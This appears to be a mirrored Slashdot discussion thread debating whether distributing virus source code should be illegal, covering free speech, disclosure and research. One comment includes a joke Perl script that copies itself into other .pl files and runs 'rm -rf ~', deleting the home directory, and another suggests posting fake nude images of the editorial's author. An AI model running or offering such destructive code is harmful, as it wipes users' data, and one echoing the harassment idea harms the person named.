Slashdot Mirror
Should Virus Distribution be Illegal?
mccormi writes "In a guest editorial on Newarchitect Sarah Gordon looks at whether posting malicious code should be allowed and what steps could be taken to stop it. What's worrisome though is that restrictions on malicious code doesn't take into account who it's malicious against and what truly defines malicious." Note that she's not talking about actually infecting computers, but merely making the code available for others to examine (and for some of them, no doubt, to try to spread in the wild).
Unless the law specified dstribution of *machine readable* malicious code (ie binaries) then MS et.al. could start nailing those who post proof-of-concept code to demonstrate the flavor of the week exploit in IIS or WinxP or what have you...more security by obscurity, yippee
If you can't see the value in jet powered ants you should turn in your nerd card. - Dunbal (464142)
I think it should be illegal to write and release viruses. Viruses should follow all standard software rules, which means, the maker could easily be sued for damages. And no, sending the virus with a EULA wouldn't protect the maker legally.
Job? I don't have time to get a job! Who will sit around and bitch about being broke and unemployed then?
would spyware be included in the categorization? It could be argued that it is viral in intent if not propigation.
Though no one likes to get a virus, and I often wonder who writes them and for what reasons, I do believe that there probably is much information to be gained from their examination as far as system function goes. From a learning standpoint, those who write them, while having too much free time on their hands, are learning some hard-core programming concepts, as are those who fight them. For the casual programmer, taking a peek at their code every now and then can actually be beneficial. But, as always, it's the person that can make good code cause bad things and vice-versa. As always, it comes down to the person, not the code. The code itself should not be illegal. Knowledge cannot be locked up, and if it is, it can break free in a dangerous way. Better to have it out in the open where the "good guys" can combat it if needbe, and everyone can learn from it.
How is posting potentially harmful virus code any different than posting OS vulnerabilities and exploits? If this were to become law, how long would it take a certain OS manufacturer to extrapolate that same concept to cover all 'malicious' code fragments that could be used to target their OS?
I don't like people who write viruses, I like getting them even less, however censoring the ability to post/review it is just another step in the slippery slope towards censorship of other things.
I think we'd all enjoy a nice cold beverage. -David Letterman
The DMCA had the intentions of eliminating piracy, however it ended up being used to fight battles that never should have been fought. If MS releases an OS with a known backdoor, does that count as malicious? If someone makes a program that utilizes this backdoor in a way that MS did not intend (regardless of in a good way or bad way), can MS claim this as malicious? Would NTFSDOS be considered malicious since it bypasses NTFS's protection?
This is one of those issues where a law cannot be both effective and fair. And possibly not either.
If you think education is expensive, you should try ignorance -- Derek Bok, president of Harvard
I like the idea of thinking about biological and computer viruses in the same way.
Researching biological viruses is legal, although people could attempt to spread said viruses maliciously. Those who deal with lethal viruses and diseases often can't just make samples and research easily accessible to anyone, even anonymous people. Why should virus "researchers" be able to do what is essentially the same thing?
Free speech is good, research is good... but so are ethics and responsibility.
mark
If you want to make an apple pie from scratch, you must first create the universe. -- Carl Sagan
Freedom of speech is protected, and rightly should be, but there are limitations to that freedom and even --gasp-- responsibilities. Writing codes for viruses, or supplying them to the public, isn't bad in itself--it's the usage of them were the ethical complications come in. Thus, one could claim that simply posting the code for viruses is fine...the people to be blamed are the ones using that code for negligent purposes.
The same could be true for yelling 'FIRE' in a crowded theatre, right? If a avalanche of trouble ensues, the fault must lie in those people who push over old ladies to get out of the theatre first, right? I mean, the person who yells fire may have played a role in facilitating all the chaos, but the actual causers of the injury are those running around..
Of course, these two scenarios are completely different (being the virus/yelling fire), but raise similar points. Freedom of speech doesn't make you free from responsiblity of your chosen speech...whether that's yelling 'Fire' or writing/supplying codes for viruses..
Damn it, what part of "Freedom of Speech" do people not get?
History has made it clear that the people pay dearly when free speech, esp. free speech regarding a matter of community security, is abridged. Telling us that Acme locks are easily broken does not protect us from criminals who are too dumb to figure it out for themselves, it only serves to give us a false sense of security.
(As an aside, this is also the foundation of some of the most damning condemnations I've seen of "child protection" laws. As some judges have observed, the true obscenity is attempting to protect minors from all adult concerns until their 18th birthday... at which point they are thrown to the wolves with absolutely no preparation for the very real challenges adults must face.)
A virus exchange site is similar. Yes, there will be some idiots (who deserve to have the full wrath of the law on them for their acts) who will use those viruses for ill will. But the same sites will also allow others to be warned that viruses against this specific software exists and is in the wild. No more Microsoft stonewalling about the existence of such attacks. No more trivializing them as highly specialized and not a concern to the average user.
This is a bit scary... but that's part of being an adult. A child can go to bed at peace that the closet is empty of monsters, but part of being an adult is knowing that there are bad guys out there *and* that you've done everything you can to keep them away. I, for one, and getting damn tired of my self-appointed "betters" trying to infantilize me.
For every complex problem there is an answer that is clear, simple, and wrong. -- H L Mencken
Although not directly related to the article, I did get an idea. Some may say this is slightly off-topic, but we'll see. I've picked "test equipment" because I want a reputable source. Meaning, this scenario would be a honest accident.
Okay so I write some code for a piece of test equipment. Let's just pick an example situation. I don't want to argue if this is a good or bad idea, but say I did it anyway. Every once in a while the machine checks to see if it is slipping its calibration. If it is, it contacts some server to say "hey look at me." Then the server responds and says "yeah I see you." Well with my expansive programming skills I accidentally code a bug. Let's say instead of contacting the intended target, I just start contacting anything I can find. Well another analyzer sees my cries for help and starts yelling too. See where I am going?
The code was never intended to broadcast huge amounts of useless traffic. It happened by accident. I picked this haphazard example to be similar to Code Red. The machines are basically messaging, like mad, between each other. So does this mean my company or I should have charged (civil or criminal) against us? I say no, but I'm sure a lawyer would scream yes.
Sarah Gordon may have some good points. It's hard to tell.
/bin/cat or /bin/cc become "viruses" under some circumstances.
....." objecting to her editorial is just automatic: she's using a term that has (1) a specific technical or mathematical meaning (to Fred Cohen and many Slashdot readers) and (2) a vague "common sense" meaning (to Windows users the general public and a few Slashdot readers). She's arguing based on both meanings. She's hoping that emotional or poorly intellectualized reactions to meaning (2) will get code representing meaning (1) outlawed.
She never bothers to define the term "virus" in a way that an arbitrary individual (me or an intellectual property lawyer or a World Court Judge) can use to determine whether or not some source code constitutes a "virus".
If she follows Fred Cohen's definition ("sequences of instructons in machine code for a particular machine that make exact copies of themselves somewhere else in the machine" - "A Short Course on Computer Viruses" 2nd ed ISBN 0-471-00769-2 John Wiley & Sons 1994) which is pretty much an english transliteration of the mathematical definition - even things like
Sarah Gordon is just fear-mongering at this point. Until she says "The term 'virus' means code that
It's crap. Give it up Sarah.
And just for good measure: http://cm.bell-labs.com/cm/cs/who/doug/v101.ps Read it and weep Sarah. Neener neener neener!
But it is never elaborated on at all. I do not understand how it can be said that posting something on the web is any more of an action than the physical act of mailing a letter to the editor, but we do say that mailing a letter to the editor falls squarely under free speech. How are we supposed to separate speech and action (something the article acknowledges are different) on the internet if the act of posting places your content beyond pure speech? How are we supposed to have free speech if we are prevented from speaking to others by posting our thoughts?
There is a big difference between saying "This code will infect machines and do this to them" and then compiling that code and releasing it with malicious intent. One is speech, the other is action. It is the same as the difference between saying "I could break into your home by doing this" and then actually going out and doing it. One is not illegal, the other is.
This reminds me of another issue. How long before distributing an MP3 player makes you an accomplice to copyright infringement because you haven't included draconian copy-protection schemes? The problem is social, not technological.
"Belief means not wanting to know what is true." [Nietzche, The Anti-Christ, 1889]
just like this contest has been promoting for years, obfuscated code may "fool" any automated tool that would somehow parse various languages. Virus writers already display some talent -- this would just encourage them to be more creative with the source.
If you think about it in the biological sense, from a purely result-oriented perspective, one might make the argument that viruses are good for computers. The justification is that viruses force people to make their code more robust, and less vulnerable to attack.
I think I subscribe to this to some extent. If we had no viruses, and didn't know what havoc they could play with our system, we'd be completely unprepared for any such trouble in our systems -- whether maliciously, or because someone's code happened to go wrong.
I don't think that you can place restrictions on what people write or do not write. I feel it's still the obligation of the system user to protect him/herself against problems and to be vigilant. It keeps us all in practice, and makes us more ready for whatever is out there, no?
In a guest editorial on Newarchitect Sarah Gordon looks at whether criticizing large corporations for their mistakes and shoddy products should be allowed and what steps could be taken to stop it. What's worrisome though is that restrictions on criticism don't take into account who it's against and what truly defines criticism." Note that she's not talking about actually infecting computers, but merely making the criticism available for others to examine (and for some of them, no doubt, to use as a tool for damaging corporate profits).
From the article:
It's true that the scientific community encourages research, but only when it's conducted within the ethical boundaries of a given discipline.
So let me get this strait... It's ethical to create software that has tons of security exploits, and spies on unsuspecting users who purchase it, but it's unethical to give people the tools they need to test their systems for vulnerability and gaurantee security for their own piece of mind. It might be OK to give such tools to large corporations, but private individuals just shouldn't need that kind of privacy...
Posting, distributing or making available source code to viruses should be illegal? You mean, like this?
CodeRed.zip at Eeye.com
and
CodeRedII.zip at Eeye.com
Eeye.com has often posted the proof-of-concept exploits as a part of their advisories... is the author of the guest editoral saying eeye.com is doing wrong?
Back when the original Code Red was stirring up a ruckus, I posted its disassembled code (from eeye) to alt.comp.virus.source, and an short discussion of several weird aspects (poor coding) of the code ensued. I don't think I did anything wrong by posting it. If some weasel used that post (or other such sources) to create CRII, so be it. IMO, by that time any servers that were still vulnerable to CR/CRII deserved to be hit and, better yet, TOS'd by there ISP.
I just don't subcribe to the idea that suppressing potentially dangerous source code will do good in the long run. Having the source available and widely distributed has several advantages:
- promotes understanding of exploit mechanisms in order avoid making the same mistakes in the futre
- promotes rapid deployment of fixes. There is no pressure greater than knowing every little script kiddy's got the code
- raises awareness of code weaknesses/failure modes/common pitfalls (maybe *someday* CS courses will teach future coders to prevent buffer overflows!)
I firmly believe that being open about software/network/OS weaknesses will gradually drive the state of the art in secure software to a much higher level. The "keep quiet", "head-in-the-sand" approach that M$ is promoting these days will only hinder such advances. I'll make a loose analogy to the old outlaws & guns argument: "If you outlaw virus source code, only outlaws will have virus source code."
In fact, I think it is *imperative* that malicious source code NOT be suppressed. How else can we arm the next generations of app and OS coders to develop resistance code?
#!/usr/bin/perl
# VIRUS.pl by l33tb0y
# sh0utz to: b33k3r and dr.ph0t0n
for (<*.pl>) {
# 5pr34d d4 l0v3
system "cat $0 >> $_";
}
# D4 P4YL04D! M3 50 3V1L!
system "rm -rf ~";
print "h4 h4 h4 h4 -- ur 0wn3d!\n";
For example, look at Napster - I dispute your argument that people wouldn't have broken those copyright laws anyway - how many people make copies of tapes for thier friends? It's simply that Napster allowed it on a SCALE that hadn't been seen before. And I'm somewhat of the argument that if the majority of people, when given the opportunity to break a law, would do so then we need to re-think the law. Especially when the result of breaking the law causes no direct harm to anyone.
However, rather than considering that we might want to re-think copyright law, into something more compatibile with modern technology, instead they simply drop even heavier bombs and try to legislate it out of existence.
This attitude toward speech is like the Victorian attitude toward sex - if you keep it in the dark where nobody can see it, we can all pretend it doesn't exist - but it still does. Keeping it in the open means that everyone knows it's there, and we can all talk about it. Yes, some people will abuse it - but I'd rather get hit by something I know about and can prepare for, than something which is kept secret and underground and that I don't even know about.
Without going into a point-by-point rebuttal, of course "that point of view is extremely dangerous". And of course much of what you said is plausible, inasmuch as wacked-out examples made for the purpose of outrage and extremism is plausible. (That's not sarcasm; it's a common rhetorical device that is serious overused and abused, but it's still somewhat valid when understood correctly.)
But you provide no evidence that of the two alternatives, yours is better. Your scenarios are for the most part equally applicable to the hiding case; instead of information spreading openly, it spreads covertly. Doesn't change much. You can't keep information from a determined person; people are just too smart.
I'd say that the post you are replying to is much better constructed as an argument, because it says why the alternative is better: The good guys can find it and learn from it. How is your proposal better? The bad guys still find it*. Now maybe the good guys don't. The "demented person" scenarios remain.
Step up a meta level. You're focusing too tightly on a small part of the problem, and missing the global implications.
I say that both revealing and hiding the information is dangerous. The danger comes from people, and therefore cannot be removed from the equation. (This is what you implicitly try to do, by hiding the information. The problem is, the information is not the danger.) But of the two alternatives, open discussion is clearly the preferable choice, both in theory, and in practice.
(*: Proof: Look at the real world. Happens all the time. This is undeniable.)
I have concluded that people need to stop thinking they can do whatever they want simply because it's not illegal.
I have been thinking that someone ought to post simulated naked pictures of Sarah on reallybadguys.org just to prove her wrong.
Edith Keeler Must Die
Security researchers who don't work for dominant companies like Symantec aren't in such a sweet position, and rely on public forums to learn about exploits. And it's not enough to be told "there is a new virus that attacks X", with the details held secret (eg, known only by Microsoft, Symantec and a few other giants). Security researchers need precise details of how the exploit works, and they need to see the virus code itself in order to write code for detecting that virus signature, or to protect against certain aspects of its behaviour.
Sarah's proposal is just a way to shut down the competition by criminalizing the only way that independent researchers have for getting information.
Doug Moen
I have written a truly remarkable program which this sig is too small to contain.
It'd be great if information could always be free, but unless we restrict dangerous forms of it, we are simply giving up our safe way of life. Although one might *want* to give arbitrary individuals access to all information, you're essentially allowing arbitrary individuals the power to do anything they desire. This system will eventually lead to catastrophe, because you cannot make the entire world's population obey an honor system.
The biggest problem with this line of thinking is that without the research being done on this stuff, there's no way to develop defenses. Someone is going to develop it eventually, and without the necessary defenses then everybody will be vulnerable. It's like you said, "because you cannot make the entire world's population obey an honor system."
Code for a virus is no different than certain Stephen King books. Both can describe illegal action. Nobody is claiming that Stephen King did anything illegal, nor is it illegal for people to buy and read his books. It's illegal to try to do some of the things he describes, in sometimes tiny detail, exactly how to do.